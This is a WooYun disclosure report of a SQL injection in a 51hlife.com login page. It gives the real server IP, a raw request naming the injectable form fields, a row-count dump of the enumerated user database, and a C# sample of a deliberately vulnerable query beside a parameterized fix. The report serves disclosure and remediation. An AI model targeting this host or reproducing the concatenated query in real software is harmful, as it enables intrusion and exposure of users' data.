
Vulnerability summary (followers: 24)

Bug ID: wooyun-2016-0187040

Title: A 好生活 site has a SQL injection that leaks a large amount of information (110k users)

Vendor: 51hlife.com

Author: 路人甲

Submitted: 2016-03-21 10:50

Fix time: 2016-05-05 10:50

Published: 2016-05-05 10:50

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-03-21: Vendor is being contacted and the report awaits vendor acknowledgement; details are not disclosed publicly
2016-05-05: Vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

Detailed description:

POST /Login.aspx?doFrom=index HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://202.101.47.116/Login.aspx?doFrom=index
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 202.101.47.116
Content-Length: 496
Pragma: no-cache
Cookie: ASP.NET_SessionId=rqf2vmi1bqg5bjsajntalhm2; ad_play_index=68; IESESSION=alive
Connection: close
__VIEWSTATE=%2FwEPDwUKMTAyNDcwNTk2NQ9kFgJmD2QWAgIDD2QWAgIBD2QWAgIDDxYCHgRUZXh0BUw8c3BhbiBjbGFzcz0ncmVkJz7mgqjpnIDopoHnmbvlvZXlkI7miY3og73ov5vooYzmk43kvZzvvIHor7fnmbvlvZXvvIE8L3NwYW4%2BZGSaI%2Bp%2BNtwfLi30igBXJr5AuilPQdYbZ%2FX4Nnhha8OakA%3D%3D&__EVENTVALIDATION=%2FwEWBAKr1PLcAwLoksmACQKTpbW1BALQl%2FnLCLxAz9%2F%2F8h77uKkAVCl1u1lt4gPTU57SMhPFmOz%2FqsQU&ctl00%24ContentPlaceHolder%24userName=asdasd&ctl00%24ContentPlaceHolder%24passWord=sadasd&ctl00%24ContentPlaceHolder%24BtSave=%E7%99%BB%E5%85%A5

[Screenshot: 1.png]

[Screenshot: 2.png]

As for how much information this is: many of the tables hold hundreds of thousands of rows.

Database: BGJK
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| BROWSELOG | 65228213 |
| LOG | 6002734 |
| BROWSELOG_BK | 5258329 |
| T_HPP_PERSON_INSURE | 3265887 |
| USERACCOUNTDETAIL | 2370927 |
| T_JS_OPERATING_NEW | 2315658 |
| USERACCOUNTDETAIL_BAK_2016 | 2288436 |
| HC_CLIENTLOG | 2122350 |
| Z_BK_USERACCOUNTDETAIL_2012 | 2009544 |
| USERACCOUNTDETAIL_ARCHIVE | 1672548 |
| Z_BK_T_JS_OPERATING_NEW_2015 | 1590677 |
| Z_BK_USERACCOUNTDETAIL_2015 | 1556540 |
| Z_BK_USERACCOUNTDETAIL_2014 | 1506670 |
| Z_USERACCOUNTDETAIL_1410_BK | 1475764 |
| T_JS_OPERATING_DTL | 1014584 |
| T_JS_OPERATING_DTL_BAK_2016 | 1014584 |
| SENDSMS | 869665 |
| Z_BK_T_JS_OPERATING_NEW_2014 | 796957 |
| Z_BK_T_JS_OPERATING_DTL_2015 | 772989 |
| BMI_INFO | 757456 |
| T_HPP_ITEM_RULE | 540488 |
| HC_T_HPP_ITEM_RULE | 523966 |
| Z_BK_T_JS_OPERATING_DTL_2014 | 479775 |
| LOG_BK | 408842 |
| T_SMS_SEND | 306356 |
| SMS_ORGCOUNT | 298738 |
| SMS_ORGCOUNT_REAL | 298738 |
| T_JS_DATAVALIDATION | 298182 |
| T_JS_STATISTICSDATADTL_JG | 285594 |
| T_JS_S_D_DTL_JG_BK_2016 | 275549 |
| Z_BK_T_JS_SDATADTL_JG_2015 | 202663 |
| T_JS_STATISTICSDATADTL_CG | 188994 |
| T_JS_S_D_DTL_CG_BK_2016 | 182386 |
| T_HPP_USERDETAIL | 180820 |
| Z_BK_T_JS_DATAVALIDATION_2015 | 180266 |
| REPORT_BASIS | 148986 |
| LOG_BGAL | 140058 |
| Z_BK_T_JS_SDATADTL_CG_2015 | 137810 |
| USERICCARD | 115907 |
| USERICCARD_BAK_2016 | 115221 |
| USERINFO | 114938 |
| Z_BK_USERICCARD_2015 | 114329 |
| USERINFO_BAK_2016 | 113450 |
| T_JS_STATISTICSDATAMST | 111548 |
| Z_BK_USERINFO_2015 | 108417 |
| T_JS_S_D_MST_BAK_2016 | 107849 |
| T_JS_STATISTICSD_MST_BAK_2016 | 107849 |
| USERACCOUNT | 102087 |
| Z_BK_T_JS_SDATADTL_JG_2014 | 101558 |
| USERACCOUNT_BAK_2016 | 100588 |
| MOBILEVALIDATION | 97494 |
| Z_BK_USERACCOUNT_2015 | 96023 |
| ITEMBOOKORDER | 89304 |
| Z_BK_USERICCARD_2014 | 86667 |
| Z_BK_USERINFO_2014 | 82302 |
| Z_BK_T_JS_DATAVALIDATION_2014 | 78737 |
| T_SECKILL_USERDETAIL | 75053 |
| Z_BK_USERACCOUNT_2014 | 73840 |
| ORGINFO | 70675 |
| Z_BK_T_JS_SDATADTL_CG_2014 | 68497 |
| T_CONSUMPTIONDATA | 68050 |
| JS_INVOICEMONTH_MXDTL | 67720 |
| JS_INVOICEMONTH_MXDTL_BAK_2016 | 67720 |
| Z_BK_JS_INVOICEM_MXDTL_2015 | 67720 |
| REPORT_BASIS_JS | 64190 |
| T_XT_ORGANIZATION | 63171 |
| PX_SURVEY_EMP | 61410 |
| T_XT_ORGANIZATIONHIERARCHY | 61039 |
| T_HPP_SYS_DEDUCTTIMING | 59687 |
| T_XLZX_REVIEW | 56184 |
| SMS_INTERFACE_DETECTION | 50735 |
| Z_BK_T_JS_SDATAMST_2015 | 50250 |
| Z_BK_T_JS_SDATAMST_2012 | 47554 |
| ORGANIZATIONS | 43939 |
| HC_T_HPP_ITEM_PRICE | 43853 |
| SMS_ASSIGNINFO | 43697 |
| T_HPP_ITEM_PRICE | 43591 |
| DOWNLOADRECORDDTL | 39052 |
| JS_INVOICEMONTH_MX | 38442 |
| JS_INVOICEMONTH_MX_BAK_2016 | 38442 |
| Z_BK_JS_INVOICEMONTH_MX_2015 | 38442 |
| Z_BK_T_HPP_ITEM_PRICE_2015 | 37516 |
| SMS_EMPINFO | 37356 |
| SMS_MOBILE | 37350 |
| SMS_MOBILE_BAK | 37350 |
| ORGINFO_NEW | 35723 |
| QUESTIONNAIRE_DETAIL | 35678 |
| SMS_ORGANIZATIONS | 35181 |
| SMS_ORGANIZATIONS_BAK | 35181 |
| Z_BK_T_JS_SDATAMST_2014 | 29023 |
| T_JS_DATAINTERFACE | 27990 |
| T_CONSUMPTIONDATA_LOG | 27833 |
| T_JS_SETTLEMENTPATTERN | 26518 |
| JS_ORG_BASIS_DATA_MX | 23368 |
| TEMP002 | 23170 |
| TEMP_EMP | 22836 |
| PX_SERVICE | 22588 |
| CHANGEPWDURL | 20263 |
| ITEM_APPRECIATION | 19344 |
| Z_BK_T_JS_SMPATTERN_2015 | 19285 |
| T_OY_GAME | 19011 |
| T_SMS_BATCHPERSON | 15745 |
| Z_BK_T_HPP_ITEM_PRICE_2014 | 15236 |
| Z_BK_T_JS_DATAINTERFACE_2015 | 13857 |
| HC_T_HPP_ITEM | 13308 |
| T_HPP_ITEM | 13148 |
| JS_INVOICEMONTH | 13070 |
| JS_INVOICEMONTH_BAK_2016 | 13070 |
| Z_BK_JS_INVOICEMONTH_2015 | 13070 |
| Z_T_JS_DATAINTERFACE_10_BK | 13070 |
| T_MEMBERMONEYCHANGERECORD | 12995 |
| JS_ORG_BASIS_DATA | 12632 |
| PX_MBBACKUP | 11710 |
| Z_BK_T_HPP_ITEM_2015 | 11448 |
| INNERMAIL | 11001 |
| T_SMS_BATCH | 10832 |
| Z_BK_T_JS_SMPATTERN_2014 | 9504 |
| FRIEND_WEIGHT | 9347 |
| JS_INVOICE | 8694 |
| JS_INVOICE_BAK_2016 | 8694 |
| Z_BK_JS_INVOICE_2015 | 8694 |
| T_SMS_BATCHGROUP | 8284 |
| JS_INVOICE_MX | 8160 |
| JS_INVOICE_MX_BAK_2016 | 8160 |
| Z_BK_JS_INVOICE_MX_2015 | 8160 |
| TRAINAPPLICATION | 7510 |
| TEMP01 | 6937 |
| PX_LOG | 5412 |
| T_HPP_ITEM_BK | 5115 |
| HC_T_HPP_ITEM_BAK | 5045 |
| TRAINTIMETABLE | 5039 |
| SYN_TASK_DAY4ITEMBOOK | 4407 |
| CABLEPOINT | 4100 |
| DX_RTEMP | 3839 |
| Z_BK_T_JS_DATAINTERFACE_2014 | 3265 |
| GENERAL_TEAM | 2607 |
| USERINFOLD | 2556 |
| SYN_TASK_DAY | 2331 |
| USERHEADINFO | 2162 |
| USERHEADINFO | 2162 |
| T_HPP_LESSMSG | 2161 |
| TEMP_SRWE | 2140 |
| ORGSUMMARY_BASIS | 2106 |
| COMPLAINTREMARK | 1972 |
| QUESTIONNAIRE_LIST | 1960 |
| H_SUBJECT_LIST | 1727 |
| T_HPP_USERDETAIL_PRICE | 1551 |
| USERTRUSTEESHIP | 1534 |
| BSE_TEMP | 1510 |
| T_MEMBERCARDINFO | 1510 |
| SYN_TASK_DAY4PUSH | 1388 |
| USER_TICKETSRECOURDINFO | 1377 |
| T_XT_USERINGROUP | 1322 |
| T_JS_DATAINTERFACE_USER | 1298 |
| COMPLAINTS | 1288 |
| TRAINTIMECARD | 1113 |
| JS_TRAINTEAM | 1098 |
| GENERAL_INFO | 990 |
| T_XT_USER | 836 |
| T_HPP_ITEMSET | 835 |
| TRAINTEACHEREVALUATION | 818 |
| HC_NX | 744 |
| TRAINNOTICE | 729 |
| T_SMS_BATCHTEMPORARYPHONE | 720 |
| PERSONAL_FRIEND | 674 |
| PX_PRE_ORDER | 656 |
| T_XT_USER_TEST | 640 |
| USERINROLE | 597 |
| SMS_LOG | 570 |
| TRAINTEAM | 463 |
| ITEM_TEMP2_YN | 452 |
| ANNOUNCEMENTINFO | 443 |
| VENUE | 443 |
| TEMP001 | 372 |
| HC_T_DP_IMAGES | 354 |
| ITEM | 341 |
| BLOG_BLOGMST | 322 |
| Z_BK_VENUE_2015 | 319 |
| DATADICTIONARY | 316 |
| Z_BK_ITEM_2014 | 313 |
| T_JS_OBJECTION | 266 |
| AD_MANAGE | 253 |
| BLOG_READBLOG | 252 |
| VENUE_BACK | 252 |
| ORGANIZATIONSSYNSETTING | 239 |
| T_XLZX_KNOWLEDGE | 235 |
| PLAY_REGISTER | 227 |
| Z_BK_VENUE_2014 | 226 |
| JS_ORG_SETTING | 224 |
| T_JS_OPERATINGCONFIG | 219 |
| HC_T_TXFL_TAGCLASS | 204 |
| VENUEAPPRECIATION | 203 |
| T_TXFL_TAGCLASS | 201 |
| Z_BK_T_JS_OPERATINGCONFIG_2015 | 195 |
| FRIEND_MESSAGE | 187 |
| Z_BK_DATADICTIONARY_2015 | 184 |
| Z_BK_T_JS_OBJECTION_2015 | 184 |
| PX_SURVEY_OPTION | 179 |
| T_XT_SCHEDULEDTASK | 179 |
| Z_BK_DATADICTIONARY_2014 | 164 |
| JS_INSTITUTION | 160 |
| T_JS_OBJECTION_DTL | 160 |
| TRAINTEACHER | 156 |
| USERORDER | 152 |
| SMS_CONFIG | 150 |
| SMS_CONFIG_TMP | 149 |
| T_ITEMPRICEROUND | 149 |
| Z_BK_T_JS_OPERATINGCONFIG_2014 | 144 |
| JS_OPERATIONMANAGEMENTFEE | 128 |
| ITEMWEBBOOK | 123 |
| QUESTIONNAIRE_ANSWERS | 122 |
| PX_HARDWARE | 107 |
| T_MEMBERCARDINFO_BAK | 91 |
| Z_BK_T_JS_OBJECTION_DTL_2015 | 84 |
| T_JKCF_COOKERKNOW | 77 |
| T_XT_GROUP | 74 |
| FRIEND_PHOTOALBUMMASTER | 70 |
| SMS_TEMPLATE | 70 |
| FRIEND_PHOTOALBUMDTL | 69 |
| Z_BK_T_JS_OBJECTION_2014 | 69 |
| T_JS_COSTINGCODE | 66 |
| Z_BK_T_JS_COSTINGCODE_2014 | 66 |
| Z_BK_T_JS_COSTINGCODE_2015 | 66 |
| TEMPDATAVALIDATION | 64 |
| T_SMS_BATCHORGANIZATION | 55 |
| T_JS_MECHANISMTABLE | 51 |
| T_XLZX_TALK_DTL | 48 |
| REGISTRATIONDETAIL | 46 |
| FL_QY_CORPWELFARE | 44 |
| PX_HARDWAREMOD | 44 |
| TRAINNOTICE_BAK | 44 |
| PX_SURVEY_TITLE | 40 |
| QUESTIONNAIRE_SUBJECT | 36 |
| Z_BK_T_JS_MECHANISMTABLE_2015 | 36 |
| T_ALPHAINFO | 33 |
| SYN_TASK_MONTH | 32 |
| T_FIELD | 30 |
| T_XT_SMSTEMPLATE | 29 |
| PX_DTL | 28 |
| T_XL_EVALUATE | 28 |
| T_XT_USERINROLE | 28 |
| Z_BK_T_JS_OBJECTION_DTL_2014 | 28 |
| PLAY_PLACE | 27 |
| T_SECKILL_ITEM | 27 |
| DATATREE | 26 |
| ITEMCLASSIFICATION | 24 |
| T_HPP_BOOKS | 24 |
| Z_BK_ITEMCLASSIFICATION_2014 | 24 |
| Z_BK_ITEMCLASSIFICATION_2015 | 24 |
| Z_BK_T_JS_MECHANISMTABLE_2014 | 24 |
| FL_SH_WELFAREINFO | 23 |
| T_HPP_WEEKEND_TJ | 23 |
| USER_XINHUAESTORE | 23 |
| T_XL_COUNSELING | 22 |
| COMMUNITY_TYPE | 21 |
| RESERVATION | 21 |
| T_ORGINFO | 21 |
| BNA_USER_LOAD | 20 |
| HC_FIRSTVIEWSETTING | 20 |
| ROLES | 20 |
| FL_SH_MERCHANTINFO | 19 |
| MOBILE_VERSION | 19 |
| T_JS_L2ORDER | 16 |
| SERVICE_CERT | 15 |
| FL_YG_ACCOUNT | 14 |
| T_XT_APPENDPARAMETER | 12 |
| PX_HITEGG_SURVEY_AW_WIN | 11 |
| PX_MST | 11 |
| T_ITEMPRICE | 11 |
| COMMUNITY_HOME | 10 |
| FL_YG_CONSUMPTIONDETAIL | 10 |
| PX_EMP | 10 |
| SKL_REPORT | 10 |
| T_STADIUM | 10 |
| T_XLZX_TALK | 10 |
| HC_CLIENTSETTING | 9 |
| T_ITEM | 9 |
| T_STADIUMHIERARCHY | 9 |
| PLAY_NOTICE | 8 |
| T_ADMINUSER | 8 |
| T_GIVEMONEYINFO | 8 |
| TEAM_ACTIVITIES | 8 |
| COMMUNITY_INDEX | 7 |
| FL_QY_WELFARETYPEMAX | 7 |
| H_LIST_MODULE | 7 |
| DOWNLOADRECORD | 5 |
| EXCEPTION_PROCESSING | 5 |
| FRIEND_GROUPS | 5 |
| ITEM_TEMP_YN | 5 |
| PX_HITEGG_SURVEY_AW | 5 |
| T_JS_OPERATINGCONFIG_USER | 5 |
| T_XT_CATEGORY | 5 |
| T_XT_ROLE | 5 |
| VENUE_PLACE | 5 |
| REGISTRATIONINFORMATION | 4 |
| T_HJ_ZF | 4 |
| T_MEMBERINFO | 4 |
| T_MEMBERTYPE | 4 |
| T_SENDADMINSMS | 4 |
| FL_SH_FORECLOSURE | 3 |
| QUESTIONNAIRE_BATCH | 3 |
| SMS_BATCH | 3 |
| HC_BASEDTL | 2 |
| HC_BASEMST | 2 |
| ORDERSETTING | 2 |
| PX_SURVEY | 2 |
| T_XT_PROVIDERACCOUNT | 2 |
| KNOWLEDGECATAGRY | 1 |
| PX_COOPERATION | 1 |
| PX_HITEGG_SURVEY | 1 |
| T_HJ_NAME | 1 |
| T_TXFL_OPENDATE | 1 |
| T_XT_ORGACCOUNTRELEVANCE | 1 |
| T_XT_PROVIDER | 1 |
+--------------------------------+---------+


Leaked user information

[Screenshot: 3.png]

Proof of vulnerability:


Fix recommendation:
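Added illustrative C# example, not code from the site or from the report author: the string-concatenation pattern that makes an ASP.NET WebForms login such as /Login.aspx injectable through its userName/passWord fields, beside the parameterized version a fix would use. The USERINFO table name comes from the row-count listing above; the column names, the connection handling and the password-hash scheme are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;

// Illustrative only: ASSUMED column names (USERNAME, PASSWORD, PWD_SALT, PWD_HASH);
// USERINFO is the table name shown in the report's row-count listing.
public static class LoginCheck
{
    // Vulnerable pattern (assumed, not the site's actual code): the form values are
    // concatenated into the SQL text, so input can change the query's structure
    // instead of being treated purely as data. Any login handler built this way is
    // injectable regardless of what the rest of the page does.
    public static bool AuthenticateUnsafe(SqlConnection conn, string userName, string passWord)
    {
        string sql = "SELECT COUNT(*) FROM USERINFO WHERE USERNAME = '" + userName +
                     "' AND PASSWORD = '" + passWord + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Hardened version: the query text is a constant and the user name travels only
    // as a typed parameter value, so it can never become SQL syntax. The password is
    // not sent to the database at all; it is verified against a stored salted hash.
    public static bool AuthenticateSafe(SqlConnection conn, string userName, string passWord)
    {
        const string sql =
            "SELECT PWD_SALT, PWD_HASH FROM USERINFO WHERE USERNAME = @userName";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@userName", SqlDbType.NVarChar, 64).Value = userName;
            using (SqlDataReader r = cmd.ExecuteReader())
            {
                if (!r.Read())
                    return false;                       // unknown user
                byte[] salt = (byte[])r["PWD_SALT"];
                byte[] expected = (byte[])r["PWD_HASH"];
                // PBKDF2-HMAC-SHA256, 100k iterations; constant-time comparison
                // (CryptographicOperations requires .NET Core 2.1+ / .NET 5+).
                using (var kdf = new Rfc2898DeriveBytes(passWord, salt, 100_000,
                                                        HashAlgorithmName.SHA256))
                {
                    byte[] actual = kdf.GetBytes(expected.Length);
                    return CryptographicOperations.FixedTimeEquals(actual, expected);
                }
            }
        }
    }
}
```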

Copyright notice: when republishing, please credit the source 路人甲@乌云


Vulnerability response

Vendor reply:

Vendor could not be contacted, or vendor actively declined the report

Vulnerability Rank: 15 (WooYun assessment)